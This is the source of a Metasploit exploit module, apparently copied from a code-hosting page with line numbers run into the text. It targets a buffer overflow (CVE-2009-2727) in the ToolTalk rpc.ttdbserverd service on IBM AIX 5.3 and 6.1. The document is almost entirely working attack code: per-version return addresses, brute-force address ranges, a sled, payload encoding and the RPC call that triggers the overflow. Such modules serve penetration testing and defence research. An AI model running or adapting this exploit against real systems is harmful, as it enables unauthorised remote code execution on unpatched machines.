Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
Views: 11780
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::SunRPC9include Msf::Exploit::Brute1011def initialize(info = {})12super(update_info(info,13'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)',14'Description' => %q{15This module exploits a buffer overflow vulnerability in _tt_internal_realpath16function of the ToolTalk database server (rpc.ttdbserverd).17},18'Author' =>19[20'Ramon de C Valle',21'Adriano Lima <adriano[at]risesecurity.org>',22],23'Platform' => [ 'aix' ],24'References' =>25[26[ 'CVE', '2009-2727'],27[ 'OSVDB', '55151' ]28],29'Payload' =>30{31'BadChars' => "\x00",32},33'Targets' =>34[35[36'IBM AIX Version 6.1.4',37{38'Arch' => 'ppc',39'Platform' => 'aix',40'Ret' => 0x20099430+4096,41'Addr1' => 0x2ff1ff50-8192,42'AIX' => '6.1.4',43'Bruteforce' =>44{45'Start' => { 'Ret' => 0x20099430-8192 },46'Stop' => { 'Ret' => 0x20099430+8192 },47'Step' => 102448}49}50],51[52'IBM AIX Version 6.1.3',53{54'Arch' => 'ppc',55'Platform' => 'aix',56'Ret' => 0x20099280+4096,57'Addr1' => 0x2ff1ffd0-8192,58'AIX' => '6.1.3',59'Bruteforce' =>60{61'Start' => { 'Ret' => 0x20099280-8192 },62'Stop' => { 'Ret' => 0x20099280+8192 },63'Step' => 102464}65}66],67[68'IBM AIX Version 6.1.2',69{70'Arch' => 'ppc',71'Platform' => 'aix',72'Ret' => 0x20099280+4096,73'Addr1' => 0x2ff1ffd0-8192,74'AIX' => '6.1.2',75'Bruteforce' =>76{77'Start' => { 'Ret' => 0x20099280-8192 },78'Stop' => { 'Ret' => 0x20099280+8192 },79'Step' => 102480}81}82],83[84'IBM AIX Version 6.1.1',85{86'Arch' => 'ppc',87'Platform' => 'aix',88'Ret' => 0x20099280+4096,89'Addr1' => 0x2ff1ffd0-8192,90'AIX' => '6.1.1',91'Bruteforce' =>92{93'Start' => { 'Ret' => 0x20099280-8192 },94'Stop' => { 'Ret' => 0x20099280+8192 },95'Step' => 102496}97}98],99[100'IBM AIX Version 6.1.0',101{102'Arch' => 'ppc',103'Platform' => 'aix',104'Ret' => 0x20099280+4096,105'Addr1' => 0x2ff1ffd0-8192,106'AIX' => '6.1.0',107'Bruteforce' =>108{109'Start' => { 'Ret' => 0x20099280-8192 },110'Stop' => { 'Ret' => 0x20099280+8192 },111'Step' => 1024112}113}114],115[116'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',117{118'Arch' => 'ppc',119'Platform' => 'aix',120'Ret' => 0x20096ba0+4096,121'Addr1' => 0x2ff1ff14-8192,122'AIX' => '5.3.9',123'Bruteforce' =>124{125'Start' => { 'Ret' => 0x20096ba0-8192 },126'Stop' => { 'Ret' => 0x20096ba0+8192 },127'Step' => 1024128}129}130],131[132'IBM AIX Version 5.3.10',133{134'Arch' => 'ppc',135'Platform' => 'aix',136'Ret' => 0x20096bf0+4096,137'Addr1' => 0x2ff1ff14-8192,138'AIX' => '5.3.10',139'Bruteforce' =>140{141'Start' => { 'Ret' => 0x20096bf0-8192 },142'Stop' => { 'Ret' => 0x20096bf0+8192 },143'Step' => 1024144}145}146],147[148'IBM AIX Version 5.3.9',149{150'Arch' => 'ppc',151'Platform' => 'aix',152'Ret' => 0x20096ba0+4096,153'Addr1' => 0x2ff1ff14-8192,154'AIX' => '5.3.9',155'Bruteforce' =>156{157'Start' => { 'Ret' => 0x20096ba0-8192 },158'Stop' => { 'Ret' => 0x20096ba0+8192 },159'Step' => 1024160}161}162],163[164'IBM AIX Version 5.3.8',165{166'Arch' => 'ppc',167'Platform' => 'aix',168'Ret' => 0x20096c10+4096,169'Addr1' => 0x2ff1ff98-8192,170'AIX' => '5.3.8',171'Bruteforce' =>172{173'Start' => { 'Ret' => 0x20096c10-8192 },174'Stop' => { 'Ret' => 0x20096c10+8192 },175'Step' => 1024176}177}178],179[180'IBM AIX Version 5.3.7',181{182'Arch' => 'ppc',183'Platform' => 'aix',184'Ret' => 0x20096c10+4096,185'Addr1' => 0x2ff1ff98-8192,186'AIX' => '5.3.7',187'Bruteforce' =>188{189'Start' => { 'Ret' => 0x20096c10-8192 },190'Stop' => { 'Ret' => 0x20096c10+8192 },191'Step' => 1024192}193}194],195[196'Debug IBM AIX Version 6.1',197{198'Arch' => 'ppc',199'Platform' => 'aix',200'Ret' => 0xaabbccdd,201'Addr1' => 0xddccbbaa,202'AIX' => '6.1.4',203'Bruteforce' =>204{205'Start' => { 'Ret' => 0xaabbccdd },206'Stop' => { 'Ret' => 0xaabbccdd },207'Step' => 1024208}209}210],211[212'Debug IBM AIX Version 5.3',213{214'Arch' => 'ppc',215'Platform' => 'aix',216'Ret' => 0xaabbccdd,217'Addr1' => 0xddccbbaa,218'AIX' => '5.3.10',219'Bruteforce' =>220{221'Start' => { 'Ret' => 0xaabbccdd },222'Stop' => { 'Ret' => 0xaabbccdd },223'Step' => 1024224}225}226],227],228'DefaultTarget' => 0,229'DisclosureDate' => '2009-06-17'))230231end232233def brute_exploit(brute_target)234235if not @aixpayload236datastore['AIX'] = target['AIX']237@aixpayload = regenerate_payload.encoded238end239240print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])241242begin243244sunrpc_create('tcp', 100083, 1)245246if target['AIX'] =~ /6\./247buf = "A"248else249buf = "AA"250end251252buf << [target['Addr1']].pack('N') * (1022 + 8)253buf << [brute_target['Ret']].pack('N') * 32254255if target['AIX'] =~ /6\./256buf << "AAA"257else258buf << "AA"259end260261buf << "\x7f\xff\xfb\x78" * 1920262buf << @aixpayload263buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)264265print_status('Sending procedure 15 call message...')266sunrpc_call(15, buf)267268sunrpc_destroy269handler270271rescue Rex::Proto::SunRPC::RPCTimeout272# print_error('RPCTimeout')273rescue EOFError274# print_error('EOFError')275end276end277end278279280